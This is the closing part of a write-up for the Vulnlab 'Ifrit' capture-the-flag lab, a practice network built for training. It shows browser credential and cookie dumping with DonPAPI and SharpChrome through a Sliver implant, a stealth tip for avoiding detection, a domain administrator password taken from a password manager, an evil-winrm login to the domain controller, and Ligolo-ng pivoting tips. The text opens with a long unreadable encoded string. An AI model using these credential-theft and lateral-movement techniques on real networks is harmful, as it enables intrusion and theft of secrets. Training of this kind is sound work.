wr8SZ9RTR7Vz2FnvmfPEPUjuDgViA95eQcBAeq8Zms4VkWSJv_cWY0MLdCtnomRYVKjkuklfNXwuUGyby0M9FD7vmOGzq-qLpQtpkMtP-L0bccm7PkQttHNWM6ZLZsJSh6-CKZOfJMw221R2iIsmufKwt0pahtbmqkmYpVC2a_TcyA1eaqKusc93AradYpK71l4B6vMv73YwuJYjgO61MSN4S2zAGxf59LCD9B-UahAPOCa6AZHEb2M7E6amQGT0gvuD1zSLBG1zYzIGF0yr9FPKuBx3QRaFZU-Ug2MjD79gvfFtvytPi9jnY9e_B0cJMIJHVitBO_ix1jnF4QOhqY5Pwy1yBTRBjUpztkf1JGbFDZgVA-soq4UaLfgvpKxu5_LXtGuHb-HCUYKyBTvQRn3kO7jHi_ztqo8tTTovoS3WLd1-nJud9gEN0608fwj3fcCzLBRkmaagD01DMB5S0kktaqL0wOJ34wes1HrkXsrnSpgbVlemyVsw5RQ4RXB9rU2un4Sl3_8KpAH7rTiuXkuop2op6QkPqhjPr627KGWBbEmgfzmdaG7eR04NIhpK3HrsOYSHzo4-NPkQo-e9PnzHdXzVkHZ_zji8Nqch5iJPTMjBRnd_aKAvr6lllbnB8UO7ijcyzMZNN8VAT-WcW0QEkhE2vy42gsDnpjfZWhiP20aUG3V2mxu_8TzbkwG6FjCG_cGKVuRVALTh20vgoKClY0yP4jYKnaSnwTXBuZwGHzN8OGk1EBDtHSG9oI0K5aRKSoxQjBw6WgWUnWT0lCKftbSWoqU0sh9mg7SRMEZVDHGDTP00p5RYYiLp40B9wDJw14hbJ5AqIZvPHbaY8hxeaQcArEG-XQR0TSjJQKRe5MTD1w6_-cQf0Y414gTCGU7UmRlg7LGjiicDolKvlo8y_9m5Ab5ZjmZA09nVrZItUcYEulCB6Aq2Y7f4bOiYjxgiw8PRm9YDWOKCKBFQXpkee4dkyqrzspUwfdzEzc_6PowEtW9QyBM63FYeBW7ZbbhfbiLpDaukt08P-udWYacqdxHyH4wBxBcldjq7A34sszDym1MQGiJ-mX546qLbBMUp_p9RDnvpxHEcXoF4nY5DhS0LPRT6rEjncFZpXn7Jn1fUYSoHivzUkZqexzT5KOjR0zfrq7m-JpO6UlQHCU42RVD_5HzGmoG8eZ9zudxbPl5sqYpQW9os3bV5w4QqdgjDCzj7KZIQ-9Kx4kTCe17wH379ndiFbvWa-ONYE7FJcp0CfrY5XuEW2_b2NHHVrho501_QD41bRZQr3kFdx_uAEFvwc2f0-giLi8TspgdEQsocp9lYxLYe7W_t0w-SPNP8cvOP3AC-TCEmUDJwi3h
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .microsoft.com/ - MC1:GUID=a06f917ad50a42ff8c0fa82989804b6e&HASH=a06f&LV=202407&V=4&LU=1720961824445
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .microsoft.com/ - MS0:f4676c3f9eac49caaad780f83979257d
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .msn.com/ - USRLOC:BID=MjQwNzE0MDU1NjU1XzY5YTM2YzM3ODc2ODdiNjA3MTcyMDRjZDQyNmE0MWYyNWYwZDg1ZGZjMDVmOWI1YzViZDIwY2NmYzc2NGE0OGM=
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] apps.microsoft.com/ - ai_session:p1vagAfal025jHL2sAK1Py|1720961823471|1720961823471
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] apps.microsoft.com/ - ai_user:EwhWq7jYTsSnkmU9jUKEJa|2024-07-14T12:57:03.467Z
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] apps.microsoft.com/ - exp-session-id:772f0dbc-6d1b-4293-931d-e85a7f3e1f8f
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] pwm.ifrit.vl/ - ppsVersion2-createdDate:2024-02-07T18:36:48.807724+00:00
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] pwm.ifrit.vl/ - ppsVersion2-lastVersion:8.2.1.0
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] pwm.ifrit.vl/ - ppsVersion2-message:None
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
  • Found admin:PWywZsXnsSht62cK
  • Found [Cookie] pwm.ifrit.vl/ - ppsVersion2-lastVersion:8.2.1.0
  • Found [Cookie] pwm.ifrit.vl/ - .PleasantIdentity.ApplicationCookie

But be careful with this method as we triggered a Medium alert:

image

Another method more stealthy using Sliver (no detection):

[server] sliver (MEAN_PRIZE) > sharpchrome -s -- logins /target:C:\\Users\\patrick.ford\\ /browser:edge

[*] sharpchrome output:

  __                 _                     
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _      
 __) | | (_| |  |_) \_ | | | (_) | | | (/_     
                |                              
  v1.12.0                               


[*] Action: Edge Saved Logins Triage


[*] AES state key file : C:\Users\patrick.ford\\AppData\Local\Microsoft\Edge\User Data\Local State
[*] AES state key      : MasterKey needed - {d10af973-27a9-4d8d-9d9d-7efa766fa616}


---  Credential (Path: C:\Users\patrick.ford\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\patrick.ford\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data,https://pwm.ifrit.vl:10001/,https://pwm.ifrit.vl:10001/,7/14/2024 5:57:43 AM,13365435463368510,admin,--AES STATE KEY NEEDED--


SharpChrome completed in 00:00:00.6272218
[*] Output saved to /tmp/sharpchrome_VDI022011623350.log

Seems related to Pleasant Password Server, so maybe a new active credentials that will allow us to find another credentials or any other sensitive data.

Check if our is correct:

[server] sliver (MEAN_PRIZE) > sa-nslookup pwm.ifrit.vl 172.16.41.14 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A pwm.ifrit.vl 172.16.41.215
  • Confirmed as we know that 172.16.41.215 hosts Pleasant Password Server
  • Add pwm.ifrit.vl /etc/hosts and the route via Ligolo-ng

image

image

image

Found the breaking glass for IFRIT domain ifrit\administrator:GoldenBuddaRests85

Previously we found a DC01 computer name but not found anything related to this server on EU-IFRIT.VL and IT-IFRIT.VL domains, then check it on IFRIT.VL now:

[server] sliver (MEAN_PRIZE) > sa-nslookup dc01.ifrit.vl 172.16.41.14 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A dc01.ifrit.vl 172.16.41.11
  • Add dc01.ifrit.vl /etc/hosts and the route via Ligolo-ng

Then connect to the DC01 and get the 4th and last flag Ifrit_Master:

$ evil-winrm -u administrator -p 'GoldenBuddaRests85' -i dc01.ifrit.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
Cannot find path 'C:\Users\Administrator\Desktop\flag.txt' because it does not exist.
At line:1 char:1
+ type ..\Desktop\flag.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Administrator\Desktop\flag.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls ..\Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/14/2024   6:04 AM             36 master.txt
-a----         7/14/2024  12:56 AM           2308 Microsoft Edge.lnk


*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\master.txt
VL{ca0ab0bde239acf37af1af8b54be9faf}

So finally Challenge solved!

Ifrit completed

StatusFlag
βœ…Ifrit_Dominance
βœ…Ifrit_Engineering
βœ…Ifrit_Incursion
βœ…Ifrit_Master
βœ…Ifrit_Metal
βœ…Ifrit_Remember
βœ…Ifrit_Shortcut

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=ff333f93-d9aa-4f59-8f9a-dfb6a52fe21a

Ifrit

Ifrit badge

Ligolo-NG tips

If we choose to use Ligolo-NG instead of chisel, we can simplify the routing table as below (after launched the openvpn and also established the ligolo tunnel:

  • Add a static route to the target where the ligolo agent has been deployed, via the VPN adapter
  • Remove the route to the internal network via the VPN adapter
  • Add the route to the internal network via the Ligolo adapter
$ sudo ip route add 172.16.41.40/32 via 10.8.0.1 dev tun0
$ sudo ip route del 172.16.41.0/24 via 10.8.0.1 dev tun0 
$ sudo ip route add 172.16.41.0/24 dev ligolo 
                                                                                                                                                                           
$ ip route
...
172.16.10.0/24 via 10.8.0.1 dev tun0 
172.16.11.0/24 via 10.8.0.1 dev tun0 
172.16.12.0/24 via 10.8.0.1 dev tun0 
172.16.13.0/24 via 10.8.0.1 dev tun0 
172.16.20.0/24 via 10.8.0.1 dev tun0 
172.16.21.0/24 via 10.8.0.1 dev tun0 
172.16.22.0/24 via 10.8.0.1 dev tun0 
172.16.23.0/24 via 10.8.0.1 dev tun0 
172.16.30.0/24 via 10.8.0.1 dev tun0 
172.16.31.0/24 via 10.8.0.1 dev tun0 
172.16.32.0/24 via 10.8.0.1 dev tun0 
172.16.33.0/24 via 10.8.0.1 dev tun0 
172.16.40.0/24 via 10.8.0.1 dev tun0 
172.16.41.0/24 dev ligolo scope link
172.16.41.40 via 10.8.0.1 dev tun0 
...

If we need to access the local ports of the currently connected agent, there’s a “magic” CIDR hardcoded in Ligolo-ng: 240.0.0.0/4 (This is an unused IPv4 subnet).

If we query an IP address on this subnet, Ligolo-ng will automatically redirect traffic to the agent’s local IP address (127.0.0.1).

Example:

$ sudo ip route add 240.0.0.1/32 dev ligolo

Link: https://github.com/nicocha30/ligolo-ng/wiki/Localhost

We can also listen to ports on the agent and redirect connections to our control/proxy server. More info https://github.com/nicocha30/ligolo-ng/wiki/Listeners

We can configure the agent as a server too. More info https://github.com/nicocha30/ligolo-ng/wiki/Bind